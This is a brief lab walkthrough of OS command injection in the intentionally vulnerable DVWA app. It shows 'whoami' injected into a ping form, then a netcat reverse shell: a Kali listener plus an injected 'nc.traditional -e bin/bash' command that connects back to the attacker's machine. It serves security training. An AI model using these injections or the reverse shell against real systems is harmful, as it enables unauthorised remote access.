- Considering a website that is used to ping your ip-address/domain name for.eg. below is a website that would ping the entered ip-address/domain.
-
Login to OWASP and click on Damn Vulnerable Web Applications
-
You would be re-directed to DVWA's login page.
-
Login to DVWA using admin as username and password.
-
Type in sample command such as
whoamiafter a dot and comma (.,) as below
-
In the result, you see the outputs of both commands i.e. ping and whoami.
- We can try to make a connection with DVWA's machine to our Kali Linux Machine. This can be done using
netcat netcatis used to connect 2 PCs- For our Kali linux, we need to set up listening port, e.g.12345
- Type the following command
nc -lvp 12345 - -l is listening mode
- -v is verbose mode
- -p specifies port number
- Type the following command
- Listening port would be used to listen to any connection coming to our PC.
- For our Kali linux, we need to set up listening port, e.g.12345
- Typing the following command would allow us to connect to victim's machine:
<your-ip-address>;nc.traditional -e bin/bash <ip-address-of-machine-to-which-you-want-to-connect>
- There would be no output once you perform this command line injection.
- Once you submit, go back to kali linux and you would see the following output:
- If you type the command
whoami, you should seewww -data
